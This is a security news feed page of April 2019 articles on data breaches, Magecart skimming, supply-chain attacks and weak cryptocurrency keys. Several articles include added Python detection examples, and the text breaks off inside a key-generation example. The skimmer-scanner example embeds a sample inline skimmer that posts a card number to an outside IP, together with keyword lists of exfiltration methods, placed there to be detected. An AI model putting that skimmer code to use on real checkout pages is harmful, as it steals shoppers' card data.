Feed aggregator

State of Washington Expands Breach Notice Laws

Info Security - Thu, 04/25/2019 - 19:44

A new law in Washington expanded regulations that mandate when consumers must be notified if a malicious actor gains access to their private data, according to a press release from the state’s office of the attorney general (AG).

In response to AG Bob Ferguson’s request for legislators to strengthen the state’s data breach notification laws, lawmakers voted unanimously in favor of HB 1071-2019-20, which the speaker signed on April 24.

“Not only is the amount of data being collected and stored about consumers increasing, the number of breaches of secure storage of the data is increasing at an alarming rate as well," Rep. Shelley Kloba, who sponsored the bill, said in the press release.

“This bill updates our consumer protection laws to shorten the notification time from 45 days to 30 days, so that consumers are made aware of a breach more quickly and can take protective action. Additionally, companies who collect and store data will need to pay more attention to safeguarding it against internal and external threats.”

In addition to shortening the notification window, the bill expands the definition of personal information that triggers notification to cover more data types, such as usernames, passwords and passport numbers. The earlier law only required notification when a breach exposed a consumer's name together with other personal information, such as a social security or driver's license number.

“My office has seen the number of Washingtonians impacted by data breaches increase year after year,” Ferguson said in the press release. “Data breaches are a serious threat to our privacy, and this law will arm consumers with information to protect their sensitive data.”

Two senators sponsored a companion bill, SB 5046-2019-20, which remains in the Senate committee; however, another bill that would give citizens the right to know the types of data that companies are collecting, storing and selling has yet to pass the state’s legislature, according to a Tripwire blog post.

“This bill overwhelmingly cleared Washington’s Senate floor earlier in 2019 after a vote of 46 to 1,” the blog said, but it has not yet arrived on the floor of the House.

Categories: Cyber Risk News

Fake Social Accounts Multiply; Can Users ID Them?

Info Security - Thu, 04/25/2019 - 18:56

Despite Facebook and Twitter repeatedly removing illegitimate accounts from their social media platforms, the number of impersonating accounts increased 56% from 2017 to 2018 and is projected to continue to grow by 30% in 2019, according to research from ZeroFOX.

Because of this rapid proliferation of fake accounts, it is becoming increasingly more difficult for users to distinguish between accounts that are real or fake, the research found. In an April 23 blog post, ZeroFOX’s Diana Parks wrote, “There is no denying that fake profiles run rampant on social media and digital platforms. Between October 2017 and September 2018, Facebook alone removed almost 2.8 billion illegitimate accounts worldwide. By some estimates, this accounts for between 25–35% of all Facebook accounts.”

While fake accounts online are inevitable, they are also highly problematic and pose security risks to individuals and organizations. Bad actors use fraudulent accounts to target individuals using social engineering. Others use fake accounts for scams or to distribute malicious content, phishing and malware, or even inappropriate content.

Still, not everyone can easily tell which social media accounts are fake. Despite a 2018 post offering users tips on how to spot a fake account, the number of impersonating profiles has increased across social networking sites. This continued growth prompted ZeroFOX to develop a quiz in which users are challenged to correctly identify the fake social media account.

In addition, research from the ZeroFOX Alpha team found that since 2017 there has been a steady growth in the number of both brand and executive impersonations. “Between 2017 and 2018, brand impersonations for ZeroFOX customers increased by 5%. Based on current projections, the ZeroFOX Alpha Team anticipates an estimated 17% increase in brand impersonations over the next year. The numbers are even more staggering for executive impersonations,” Parks said.

Fake accounts impersonating top executives and VIPs reportedly grew by over 300% between 2017 and 2018 and are expected to rise another 47% in 2019.

Categories: Cyber Risk News

ASUS Not Alone in ShadowHammer Supply Chain Attack

Info Security - Thu, 04/25/2019 - 18:48

Researchers believe that Taiwanese technology giant ASUS was not the only company hit in last month's supply chain attack, dubbed Operation ShadowHammer. According to Kaspersky Lab, the attackers infiltrated at least six other organizations during the operation.

“In our search for similar malware, we came across other digitally signed binaries from three other vendors in Asia,” Kaspersky researchers wrote in a blog post. Electronics Extreme Co. Ltd., a game developer from Thailand, was among the vendors listed as having released digitally signed binaries of a video game called Infestation: Survivor Stories, which was reportedly taken offline in 2016.

“This weaponization of code signing is direct evidence that machine identities are a beachhead for cyber-criminals. The only way to protect against these kinds of attacks is for every software development organization to make sure they are properly protected,” said Michael Thelander, director of product marketing at Venafi.

“No one should be surprised at how extensive this attack is. Due to their wide reach, bad actors target code-signing certificates in broad, deliberate campaigns and leverage them in large, multi-stage attacks.”

Supply chain attacks have become increasingly concerning, according to the 2019 Internet Security Threat Report, which found that supply chain attacks rose by 78% between 2017 and 2018, prompting US intelligence agencies to partner in designating April as Supply Chain Integrity Month.

“Software subversion attacks – such as the ASUS Live Update intrusions – are particularly difficult to thwart because they are incredibly sophisticated and highly targeted,” said Chris Duvall, senior director at The Chertoff Group.

“Unfortunately, due to the apparent success rate, we can expect to see a continued surge in the use of third-party applications as the back channel into networks. While not a panacea, we advise clients to help prevent these attacks by accessing file integrity whenever possible and maintaining good cyber hygiene through configuration hardening, vulnerability management, segmentation.”

Categories: Cyber Risk News

IoT Set to Put Strain on Cyber Skills Market

Info Security - Thu, 04/25/2019 - 10:01

UK demand for cybersecurity skills rose 10% year-on-year in the last quarter of 2018, with adoption of the Internet of Things (IoT) technologies set to put further strain on the market going forward, according to Experis.

The recruitment company’s latest Experis Industry Insiders report revealed a near 17% increase in advertised cybersecurity roles from the previous quarter, to 13,214.

However, average permanent salaries actually dropped slightly, by 2% year-on-year to £58,557, as employers sought out short-term solutions to fill their skills gaps. Contractor day rates jumped nearly 20% over the previous year, to £505.

In the IoT space, the number of new roles advertised jumped 49% quarter-on-quarter to Q4 2018. Permanent (1.5%) and contractor (4%) average salaries both increased.

“IoT offers huge opportunities for organizations, if they have the right cybersecurity foundations in place to take advantage of new innovations safely. We can see that there is a strong demand for top talent, but the market is struggling to keep pace,” argued Experis director of specialist markets, Martin Ewings.

“Businesses are having to be creative and take a blended approach to their talent acquisition strategies — tapping into the contractor market to build a hybrid team of permanent and temporary workers. In doing so, they can have fast access to the skills they need right now, while taking a longer-term view by building permanent capabilities and investing the time required to enable strategic development.”

However, building these permanent capabilities will be challenging given continued global shortfalls. Skills shortages in cybersecurity have reached nearly three million worldwide, including 142,000 in EMEA, according to (ISC)2.

Defense contractor Raytheon is doing its bit by announcing this week a new cyber-apprenticeships scheme as part of a £2m investment strategy which also includes a Cyber Academy to train university students.

The firm claimed there would be opportunities for 70 cyber-apprentices each year for the two-year program, which offers an alternative to three- and four-year degree courses. Plans are in place to certify around 280 apprentices over four years.

Categories: Cyber Risk News

Dark Web’s Wall Street Market Suspected of Exit Scam

Info Security - Thu, 04/25/2019 - 09:53

Dark web drugs marketplace Wall Street Market appears to have become the latest underground site to be hit by an exit scam, taking with it an estimated $30m of users’ money.

News has swirled for days that the site’s owners are about to pull the plug, with suspicions raised after an official moderator published a notice claiming that it had suffered a server crash. This meant it was unable to synchronize bitcoin wallets with the blockchain, the individual claimed.

“Due to this incident, we were forced to send crypto assets manually to the waiting list bitcoin wallet, as we have to wait for this process to complete, so that coins can be sent to the appropriate matching escrow wallet,” the post continued.

“Our technical advisors said that the platform will soon shift to the maintenance mode in order to prevent sending of more bitcoins, and they estimated the synchronization process to be successfully completed yesterday.”

However, multiple posts on dark web Reddit-like forum Dread claim this is merely a distraction designed to buy the administrators time while they drain funds, according to Deepdotweb.

Users have also taken to Reddit to complain about problems with the site, suggesting that its owners have decided to exit scam after a large influx of users and money that came from the recently shuttered Dream Market.

Exit scams typically occur when dark web sites stop shipping orders but continue to accept payment. Once a significant pot of money is built up in escrow, the administrators take it and close the site.

This latest incident highlights the continued uncertainty of doing business on the dark web. Law enforcers have done their best to disrupt some of the biggest marketplaces in recent years, notably with the takedowns of Hansa and AlphaBay in 2017.

Things had begun to stabilize since then, but exit scams are a constant concern and widely seen as a cost of doing business on the dark web.

It could be that the administrators of Wall Street Market decided to do a runner with the money rather than face the potential scrutiny of investigators.

Categories: Cyber Risk News

Report: 42% of Used Drives Sold on eBay Hold Sensitive Data

Info Security - Thu, 04/25/2019 - 09:20

A new report from Blancco Technology Group has warned that those looking to make some money by selling used storage drives may be putting themselves at risk of falling victim to cybercrime.

As detailed in Privacy for Sale: Data Security Risks in the Second-Hand IT Asset Marketplace, Blancco, in conjunction with Ontrack, analyzed 159 leading brand drives purchased through auction site eBay in the US, UK, Germany and Finland, discovering that almost half (42%) still held sensitive data.

What’s more, 15% of the drives assessed were found to contain personally identifiable information (PII), despite sellers surveyed by Blancco as part of the research stating they had used proper data sanitization methods to ensure no data was left behind. This worrying finding suggests that although sellers recognize the need to remove any data before looking to sell-on a storage drive, the methods they are using are inadequate.

“Selling old hardware via an online marketplace might feel like a good option, but in reality, it creates a serious risk of exposing dangerous levels of personal data,” said Fredrik Forslund, VP, cloud and data erasure, Blancco. “By putting this equipment into the wrong hands, irreversible damage will be caused – not just to the seller, but their employer, friends and family members.”

It is also clear that there is confusion around the right methods of data erasure, Forslund added, as each seller was under the impression that data had been permanently removed.

“It’s critical to securely erase any data on drives before passing them onto another party, using the appropriate methods to confirm that it’s truly gone. Education on best ways to permanently remove data from devices is a vital investment to negate the very real risk of falling victim to identity theft, or other methods of cybercrime.”

“Deleting data is notoriously difficult,” added Sam Curry, chief security officer at Cybereason. “Most people don’t understand and probably shouldn’t have to understand how indexing works, but most so-called deletion just removes pointers to data and not the data itself.

“Destruction of the device really doesn’t make the data go away either; sure parts of it might be damaged or hard to read because the media can't be plugged in easily. The data, however, persists.

“The conventional best practices for securely decommissioning drives before disposal are to get professionals that you trust (and that’s a big deal and another subject) to really wipe and rewrite every trace ‘three times,’ which feels a little like overkill to laypeople. It does matter, though, when the data you have is in trust from and for other people.”
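The point Forslund and Curry make, that deletion must be confirmed rather than assumed, is easy to turn into a check. The following is an added example and is not code from Blancco, Ontrack or Cybereason: it builds a small constructed disk image in a temporary directory, scans it for blocks that still hold data, overwrites it, and scans again. The block size, the positions of the "residual" blocks and the image size are assumptions for the demonstration.

```python
import os
import secrets
import tempfile
from typing import List, Optional, Tuple

BLOCK_SIZE = 4096  # assumed sector-aligned block size for the scan


def make_constructed_image(path: str, size_blocks: int = 256, dirty_blocks=(3, 77, 200)) -> None:
    """Build a constructed disk image (not a real drive): mostly zeros, with a few blocks of
    random bytes standing in for data the seller believed had been deleted."""
    with open(path, "wb") as f:
        for i in range(size_blocks):
            f.write(secrets.token_bytes(BLOCK_SIZE) if i in dirty_blocks else b"\x00" * BLOCK_SIZE)


def find_residual_blocks(path: str, block_size: int = BLOCK_SIZE, sample: Optional[int] = None) -> List[int]:
    """Return byte offsets of blocks that are neither all-zero nor all-0xFF (an erased flash page
    reads back as 0xFF). sample=None scans every block; a positive value checks that many randomly
    chosen blocks instead, which is the practical option on a multi-terabyte drive."""
    nblocks = os.path.getsize(path) // block_size
    indexes = range(nblocks) if sample is None else sorted({secrets.randbelow(nblocks) for _ in range(sample)})
    zero, ones = b"\x00" * block_size, b"\xff" * block_size
    residual = []
    with open(path, "rb") as f:
        for i in indexes:
            f.seek(i * block_size)
            if f.read(block_size) not in (zero, ones):
                residual.append(i * block_size)
    return residual


def overwrite_image(path: str, block_size: int = BLOCK_SIZE) -> None:
    """Single full overwrite with zeros, flushed to stable storage. On a real device this is the
    software-only fallback: spare and remapped flash cells are not reachable from here, so where
    the firmware supports it, ATA Secure Erase, NVMe Format/Sanitize or a full discard is the
    right tool, and this scan is the confirmation step that follows it."""
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        for off in range(0, size, block_size):
            f.seek(off)
            f.write(b"\x00" * min(block_size, size - off))
        f.flush()
        os.fsync(f.fileno())


def run_demo() -> Tuple[List[int], List[int]]:
    """Create the constructed image, scan it, wipe it, and scan again. Returns (before, after)."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "drive.img")
        make_constructed_image(path)
        before = find_residual_blocks(path)
        overwrite_image(path)
        after = find_residual_blocks(path)
    return before, after


if __name__ == "__main__":
    before, after = run_demo()
    print(f"residual blocks before wipe: {before}")
    print(f"residual blocks after wipe:  {after}")
```

Pointed at a real block device (`/dev/sdX` on Linux, read with appropriate privileges), `find_residual_blocks` with a sample of a few thousand blocks gives a quick answer to the question the survey respondents got wrong: whether the method they used actually removed anything.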

Categories: Cyber Risk News

#CYBERUK19: GCHQ Ramps Up Intelligence Sharing with UK Firms

Info Security - Thu, 04/25/2019 - 08:55

GCHQ boss Jeremy Fleming has revealed how the government listening post has improved its collaboration with UK businesses over the past year, to enable intelligence sharing within seconds.

Fleming told an audience of IT security professionals at the government’s CYBERUK conference in Glasgow yesterday that the agency is sharing intelligence with banks to enable real-time customer alerts, as well as the wider business community.

“In the last year we have made it simple for our analysts to share time critical, secret information in a matter of seconds. With just one click, this information is being shared and action is being taken,” he added.

“In the coming year, we will continue to scale this capability so — whether it's indicators of a nation state cyber actor, details of malware used by cyber-criminals or credit cards being sold on the dark web — we will declassify this information and get it back to those who can act on it.”

This is the result of the Industry100 initiative coordinated by GCHQ’s National Cyber Security Centre (NCSC). Fleming claimed it had been so successful that the project will be made permanent in the future.

Another sign of its effectiveness came in helping protect smaller firms against what appears to have been a Magecart campaign.

“This year, we identified over 1200 sites which were serving malicious code to illicitly copy credit card transactions,” said Fleming. “We were able to help these small businesses fix the problem and protect their customers and their reputation.”

The government’s vision to make the UK the safest place to live and work online will require a “national effort” to achieve — involving both public and private sectors and consumers, he claimed.

Sarah Armstrong-Smith, head of continuity & resilience at Fujitsu, agreed that public-private partnerships are key to tackling cyber-threats.

“By working collaboratively, organizations can share with each other, their partners and government, practical knowledge, intelligence and technological innovation that helps fight cybersecurity threats and increase resilience,” she added. “In order to make a stand and stop cyber-criminals, we must unite in our efforts to tackle the continuing challenge that we all face.”

Jake Moore, cyber security specialist at ESET, also welcomed the industry outreach efforts by GCHQ.

“GCHQ working more closely with banks and other businesses can’t come soon enough. Consumers have been in desperate need for help and support from law enforcement for quite some time as so few people are aware of how to protect themselves online,” he argued.

“Cybersecurity awareness is a national issue and those who are unaware of the magnitude of the problem require extra support. Sharing intelligence in real time with banks might be the difference between someone losing their life savings and being able to stop the attack in the first place.”

Categories: Cyber Risk News

Insider Threats a Top Risk to Healthcare

Info Security - Wed, 04/24/2019 - 18:46

Across the healthcare sector, ransomware is reportedly no longer the most prevalent security threat, according to new research from Vectra that found attacks decreased during the second half of 2018.

The Vectra 2019 Spotlight Report on Healthcare found that internal human error and misuse occur much more frequently than hacking. In addition, a growing number of errors are the result of unmanaged devices and lateral movement of device-to-device communication.

Based on data from the Attacker Behavior Industry Report (2019 RSA Conference Edition), researchers also observed network behaviors from a sampling of 354 opt-in enterprise organizations in healthcare and eight other industries.

Among the findings, the report noted that attackers hide command-and-control communications in healthcare networks using HTTPS tunnels. “Hidden HTTPS tunnels are the most common behavior detected in healthcare. This traffic represents external communication involving multiple sessions over long periods of time that appear to be normal encrypted web traffic. When attackers hide their command-and-control communications in HTTPS tunnels, it often looks like service provider traffic,” the report said.

Researchers also found that hidden domain name system (DNS) tunnels were commonly used to mask data exfiltration behaviors, as these behaviors can also be caused by IT and security tools that use DNS communication.

The second most-common behavior consistent with data exfiltration in healthcare, according to the research, is the smash and grab. “This occurs when a large volume of data is sent to an external destination not commonly in use, in a short period of time.”

Security cameras routinely push large volumes of data to a hosted cloud site, so smash-and-grab behavior can pass as the normal operation of an IoT device. Attackers can use that expected traffic as cover for their own transfers.
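The three behaviors the report describes (periodic hidden tunnels, DNS tunneling, and smash-and-grab bursts) can all be scored from flow and DNS telemetry without inspecting payloads. The block below is an added example, not Vectra's detection logic: it runs three simple detectors over a constructed set of flow records and DNS queries, with an allowlist for devices such as cameras that are expected to move bulk data. Thresholds, IPs, hostnames and the record layout are assumptions for the demonstration.

```python
import hashlib
import math
from collections import defaultdict
from statistics import mean, pstdev
from typing import List, Tuple

# Constructed sample telemetry (not data from the Vectra report).
# Flow records: (timestamp_s, src_ip, dst, bytes_out)
BEACON = [(t * 300, "10.0.1.5", "203.0.113.7:443", 1_200) for t in range(1, 9)]          # callback every 5 min
NORMAL = [(t, "10.0.1.5", "93.184.216.34:443", 40_000) for t in (17, 95, 400, 410, 1300, 1900, 2000, 2333)]
CAMERA = [(t * 60, "10.0.9.20", "cam-upload.example.net:443", 30_000_000) for t in range(1, 6)]  # bulk uploader
SMASH = [(5000 + t * 5, "10.0.1.5", "198.51.100.9:443", 20_000_000) for t in range(5)]   # 100 MB in 20 s, new host
FLOWS = BEACON + NORMAL + CAMERA + SMASH


def _blob(i: int) -> str:
    """Deterministic stand-in for an encoded exfiltration chunk carried in a DNS label."""
    return hashlib.sha256(str(i).encode()).hexdigest()[:40]


# DNS records: (timestamp_s, src_ip, qname)
DNS_QUERIES = [(i, "10.0.1.5", f"{_blob(i)}.exfil.example") for i in range(25)]
DNS_QUERIES += [(i * 50, "10.0.2.8", n) for i, n in enumerate(("www.example.com", "mail.example.com", "api.example.com"))]

# Destinations expected to receive large volumes (cameras, backup agents); maintained by hand.
KNOWN_BULK_DESTINATIONS = {"cam-upload.example.net:443"}


def shannon_entropy(s: str) -> float:
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def detect_beacons(flows, allowlist=KNOWN_BULK_DESTINATIONS, min_sessions=6, max_jitter=0.2) -> List[Tuple[str, str]]:
    """Flag (src, dst) pairs whose session start times are too regular for human-driven traffic:
    enough sessions, and a coefficient of variation of the inter-session gaps at or below max_jitter."""
    by_pair = defaultdict(list)
    for ts, src, dst, _ in flows:
        if dst not in allowlist:
            by_pair[(src, dst)].append(ts)
    hits = []
    for pair, times in by_pair.items():
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        if len(gaps) + 1 < min_sessions or mean(gaps) <= 0:
            continue
        if pstdev(gaps) / mean(gaps) <= max_jitter:
            hits.append(pair)
    return hits


def detect_dns_tunnels(queries, min_queries=20, min_label_len=30, min_entropy=3.0) -> List[str]:
    """Flag registered domains that receive many long, high-entropy subdomain labels, the
    signature of data being carried out in query names."""
    by_domain = defaultdict(list)
    for _, _, qname in queries:
        labels = qname.rstrip(".").split(".")
        if len(labels) < 3:
            continue
        by_domain[".".join(labels[-2:])].append(".".join(labels[:-2]))
    hits = []
    for domain, subs in by_domain.items():
        if len(subs) < min_queries:
            continue
        lengths = [len(s) for s in subs]
        entropies = [shannon_entropy(s) for s in subs]
        if mean(lengths) >= min_label_len and mean(entropies) >= min_entropy:
            hits.append(domain)
    return hits


def detect_smash_and_grab(flows, allowlist=KNOWN_BULK_DESTINATIONS, window_s=60, min_bytes=50_000_000) -> List[str]:
    """Flag destinations outside the allowlist that receive at least min_bytes within any
    window_s-second sliding window."""
    by_dst = defaultdict(list)
    for ts, _, dst, nbytes in flows:
        if dst not in allowlist:
            by_dst[dst].append((ts, nbytes))
    hits = []
    for dst, events in by_dst.items():
        events.sort()
        start, total = 0, 0
        for ts, nbytes in events:
            total += nbytes
            while ts - events[start][0] > window_s:
                total -= events[start][1]
                start += 1
            if total >= min_bytes:
                hits.append(dst)
                break
    return hits


if __name__ == "__main__":
    print("beacons:", detect_beacons(FLOWS))
    print("dns tunnels:", detect_dns_tunnels(DNS_QUERIES))
    print("smash and grab:", detect_smash_and_grab(FLOWS))
```

Run with the allowlist emptied, `detect_smash_and_grab` also flags the camera's upload host, which is exactly the false positive the report warns about; the allowlist, not a looser threshold, is the right way to suppress it.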

“Healthcare organizations struggle with managing legacy systems and medical devices that traditionally have weak security controls, yet both provide critical access to patient health information,” said Chris Morales, head of security analytics at Vectra. “Improving visibility into network behavior enables healthcare organizations to manage risk of legacy systems and new technology they embrace.”

Categories: Cyber Risk News

Magecart Swoops in to Strike Atlanta Hawks Shop

Info Security - Wed, 04/24/2019 - 17:08

The online shop for the Atlanta Hawks currently states that it is temporarily down for maintenance, and according to Sanguine Security, the ecommerce site is the latest victim of a Magecart attack.

In the wild, hawks hold their place at the top of the food chain. On the court, the Atlanta Hawks boast 29 wins for the 2018–2019 season. The ecommerce store, though, reportedly has a weak link in its supply chain.

"Yesterday, we were alerted that the host site for HawksShop.com was subject to an isolated attack," a spokesperson for the Hawks organization said. "We take these matters of security and privacy extremely seriously. Upon receiving that information, we disabled all payment and checkout capabilities to prevent any further incident.

"At this stage of the investigation, we believe that less than a handful of purchases on HawksShop.com were affected. We are continuing to investigate and will provide updates as needed."

According to an April 23 post, Magecart thieves injected a payment skimmer in the online store of the Atlanta Hawks. 

“As many online stores do, the Atlanta Hawks shop also runs Magento Commerce Cloud 2.2, a commonly used enterprise-grade e-commerce system, owned by Adobe. While Magento itself is quite secure, attackers often use insecure third-party components to gain access to the core of the shop system,” Sanguine Labs wrote.

Leveraging vulnerabilities in third parties has proven successful for the Magecart group, which is also reportedly responsible for infecting hundreds of websites via supply chains. “Cyber-criminals have found that this card-skimming malware is stealth and effective in securing credit card information off of websites. This payment card information can have a huge impact on customers, far beyond the unauthorized use of their cards,” said Ryan Wilk, VP of customer success for NuData Security, a Mastercard company.

“Payment card information, combined with other user data from other breaches and social media, builds a complete profile. Using these real identities, and sometimes fake identities with valid credentials, allows cyber-criminals to take over accounts, apply for loans and much more. This is why more companies today are implementing user verification platforms that include passive biometrics that verify users based on more parameters than just their personally identifiable information.”

Sanguine Labs reported that the time frame for detection is small, with new attacks being discovered each week. In addition to using automation to identify and prevent attacks, “passive biometric technology is making stolen data valueless by verifying users based on their inherent behavior instead of relying on their data. This makes it challenging for bad actors to access illegitimate accounts, as they can't replicate the customer’s inherent behavior,” Wilk said.
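Because Magecart skimmers arrive as injected or third-party JavaScript on the checkout page, a cheap first check is to audit the page's `<script>` tags: which origins they load from, whether externally hosted scripts carry a Subresource Integrity hash, and whether any inline script both touches card fields and makes a network call. The following is an added example, not Sanguine Security's scanner or anything from the Hawks shop: it runs that audit over a constructed checkout page fragment. The hostnames, the card-field and exfiltration keyword lists, and the `integrity` value (a placeholder of the right shape, not a real digest) are assumptions.

```python
from html.parser import HTMLParser
from typing import List, Tuple
from urllib.parse import urlparse

# Constructed checkout page fragment (not the Hawks shop's real markup).
SAMPLE_CHECKOUT_HTML = """
<html><head>
<script src="/static/frontend/Magento/luma/en_US/requirejs/require.js"></script>
<script src="https://cdn.example-payments.com/checkout.js"
        integrity="sha384-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
        crossorigin="anonymous"></script>
<script src="https://cdn-analytics.example.org/track.js"></script>
<script>
document.querySelector('[name="payment[cc_number]"]').addEventListener('change', function (e) {
  fetch('https://203.0.113.5/g', {method: 'POST', body: btoa(e.target.value)});
});
</script>
</head><body></body></html>
"""

# Heuristic keyword lists (assumed): field names a skimmer reads, and ways it sends data out.
CARD_FIELD_HINTS = ("cc_number", "cc_cid", "card_number", "cvv", "expiration")
EXFIL_HINTS = ("fetch(", "XMLHttpRequest", "sendBeacon", "new Image", ".src=")


class ScriptAuditor(HTMLParser):
    """Collects (finding_kind, detail) pairs for every <script> tag on the page."""

    def __init__(self, page_host: str, trusted_hosts):
        super().__init__()
        self.page_host = page_host
        self.trusted = set(trusted_hosts) | {page_host}
        self.findings: List[Tuple[str, str]] = []
        self._inline = None  # text chunks collected while inside an inline <script>

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = {k: (v or "") for k, v in attrs}
        if "src" not in a:
            self._inline = []
            return
        host = urlparse(a["src"]).hostname or self.page_host  # relative src resolves to the page host
        if host not in self.trusted:
            self.findings.append(("untrusted-origin", a["src"]))
        if host != self.page_host and not a.get("integrity"):
            self.findings.append(("missing-sri", a["src"]))

    def handle_data(self, data):
        if self._inline is not None:
            self._inline.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._inline is not None:
            body = "".join(self._inline)
            self._inline = None
            if any(h in body for h in CARD_FIELD_HINTS) and any(h in body for h in EXFIL_HINTS):
                self.findings.append(("inline-skimmer-pattern", body.strip()[:60]))


def audit_scripts(html: str, page_host: str, trusted_hosts=()) -> List[Tuple[str, str]]:
    """Audit one page. trusted_hosts lists the third-party origins the shop deliberately loads from."""
    parser = ScriptAuditor(page_host, trusted_hosts)
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for kind, detail in audit_scripts(SAMPLE_CHECKOUT_HTML, "shop.example", ["cdn.example-payments.com"]):
        print(f"{kind:24} {detail}")
```

On the sample page the payment provider's script passes because it is both trusted and pinned with SRI, the analytics script is flagged twice (unknown origin, no SRI), and the inline handler is flagged for reading the card number and posting it elsewhere. A Content Security Policy with `script-src` restricted to the same trusted origins and `connect-src` restricted to the shop and its payment provider would have blocked the POST in that inline script even if the injection itself went unnoticed.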

Categories: Cyber Risk News

Online Fitness Store Gets One-Upped by Hackers

Info Security - Wed, 04/24/2019 - 15:44

Lifting weights might build strength for the body, but for customers of Bodybuilding.com, bulking up wasn’t enough to stop hackers from stealing their personal data. According to a security notice issued by the popular online fitness store, Bodybuilding.com recently experienced a security incident that may have affected customer information.

“We became aware of a data security incident involving unauthorized access to our systems in February 2019. We engaged one of the leading data security firms to conduct a thorough investigation, which traced the unauthorized activity to a phishing email received in July 2018,” according to the statement.

“On April 12, 2019, we concluded our investigation and could not rule out that personal information may have been accessed. While we have no evidence that personal information was accessed or misused, we are notifying all current and former customers and users about the incident out of an abundance of caution to explain the circumstances as we understand them.”

In the aftermath of discovering the incident, the company contacted law enforcement and brought in external forensic investigators. Additionally, the notice to customers said that the company will be forcing a password reset upon the next login for all of its customers.

The company does not store full credit or debit card information, but customers do have the option of storing card information in their accounts. In those cases, Bodybuilding.com only stores the last four digits of the card, and according to the statement, it never stores the full card number.

“While we have no evidence that personal information was accessed or misused, information you provided to us which might have been accessed in this incident could include name, email address, billing/shipping addresses, phone number, order history, any communications with Bodybuilding.com, birthdate, and any information included in your BodySpace profile,” the company said, adding that much of the information in the BodySpace profile is already public.

“We’re never out of danger from a data breach of our personal information and passwords, as the Bodybuilding.com incident reminds us. Despite the fact that web applications often house sensitive consumer data, they are often forgotten when it comes to implementing security measures,” said Oscar Tovar, vulnerability verification specialist, WhiteHat Security.

“Since Bodybuilding.com’s breach was a phishing attack, this showcases the importance of ongoing security training for employees. Organizations’ people continue to be the single largest threat vector for successful breaches. In addition, this paints a large target on an organization making them an easy target for hackers, who can exploit them and gain access to sensitive information. Every single company that touches sensitive data needs to make security a consistent, top-of-mind concern.”

Categories: Cyber Risk News

BBC presenter wins personal service company case

Outlaw.com - Wed, 04/24/2019 - 10:49
ITV's 'Loose Women' presenter Kaye Adams has won a tax tribunal case in which HM Revenue & Customs (HMRC) claimed that her personal services company (PSC) should have applied IR35 rules to payments made by the BBC for presenting a BBC Scotland radio programme. 
Categories: Cyber Risk News

FBI: BEC Losses Surged to $1.3bn in 2018

Info Security - Wed, 04/24/2019 - 10:25

The FBI dealt with cyber-attacks causing losses of over $2.7bn in 2018, nearly half of which were linked to Business Email Compromise (BEC) scams.

In total, there were over 20,000 victims of BEC/Email Account Compromise (EAC) last year, leading to losses of just under $1.3bn, the largest of any cybercrime type. The nearest to this were confidence fraud/romance scams ($362m) and investment cybercrime ($253m), according to the 2018 Internet Crime Report.

The FBI noted an increase in the number of gift card BEC scams, of the sort spotted by Agari recently. The security vendor claimed fraudsters are increasingly transferring their victims from email to mobile communications early on in the scam.

The largest group losing money to cyber-criminals was the over-60s ($649m), followed by the 50-59 age group ($495m). This could be partly explained by the continued prevalence of tech support scams which predominantly target the elderly. There were over 14,000 reported victims last year, linked to losses reaching almost $39m — a 161% increase from 2017.

Elsewhere, the number of reported ransomware victims dropped from 1,783 to 1,493 cases. However, the losses incurred by these victims rose from $2.3m to $3.6m. What’s more, these estimates don’t include lost business, wages, files, equipment, productivity or third-party remediation.

“In some cases, victims do not report any loss amount to the FBI, thereby creating an artificially low ransomware loss rate. Lastly, the number only represents what victims report to the FBI via the IC3 and does not account for victim direct reporting to FBI field offices/agents,” the report claimed.

Finally, the FBI also noted a strong surge in extortion-related attacks in 2018. The 51,000+ complaints it received accounted for losses of over $83m, a 242% increase on 2017 figures. These included DoS attacks, “hitman schemes,” sextortion, government impersonation schemes, loan schemes, and high-profile data breaches.

Categories: Cyber Risk News

Online Thief Cracks Private Keys to Steal $54m in ETH

Info Security - Wed, 04/24/2019 - 09:39

An individual or group of hackers have managed to amass over $54m in stolen digital currency by raiding digital wallets improperly secured with private keys, according to a new report.

Consultancy Independent Security Evaluators (ISE) claimed the “Blockchainbandit” had taken advantage of poorly implemented private keys to transfer nearly 38,000 ETH out of the targeted wallets to one under its control.

That was the figure as of January 13, 2018, but it may be many times greater today, the firm warned. In a test operation, it placed a dollar’s worth of ETH in a weak private key-derived wallet and saw it transferred out to the attacker within seconds.

In total, ISE claimed it was able to guess or duplicate 732 weak private keys in use on the Ethereum blockchain, highlighting a potential issue with key generation by developers.

The firm suggested that programming errors in the software generating these keys has made them easy to brute force.

It hypothesized that a 256-bit private key may have been truncated due to coding mistakes, meaning it’s insufficiently complex. Other possible errors suggested by the researchers included “error codes used as keys, memory reference issues, object confusion, stack corruption, heap corruption, or unchecked pre-compiled coding errors.”

It is even possible, ISE claimed, that users were allowed to choose their own keys.

“The bottom line is that a private key needs to be random, unique, and practically impossible to guess in a brute force attack,” argued ISE executive partner Ted Harrington.

ISE urged developers to use well-known libraries or platform-specific modules for random number generation; use a cryptographically secure pseudo-random number generator; audit code for truncated keys; and use multiple sources of entropy. It also claimed developers should review NIST guidelines on cryptographic random number generation.
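The defensive checks ISE recommends (a cryptographically secure generator, and an audit for truncated keys) can be illustrated with a short Python example. This is an added example and is not code from ISE or from the report: it assumes Ethereum's secp256k1 curve order, uses the operating system CSPRNG via the `secrets` module, and treats fewer than 128 effective bits as the audit threshold (an assumption chosen here; a genuinely random 256-bit key falls below it with negligible probability). The `simulate_32bit_truncation` helper is a hypothetical reproduction of the kind of coding mistake the article describes, included so the audit has something to flag.

```python
import secrets
from typing import List

# Order n of the secp256k1 group; valid Ethereum private keys lie in [1, n-1].
SECP256K1_N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
KEY_BYTES = 32


def generate_private_key() -> bytes:
    """Draw 32 bytes from the OS CSPRNG, rejecting the (astronomically rare)
    values that fall outside the valid scalar range for secp256k1."""
    while True:
        key = secrets.token_bytes(KEY_BYTES)
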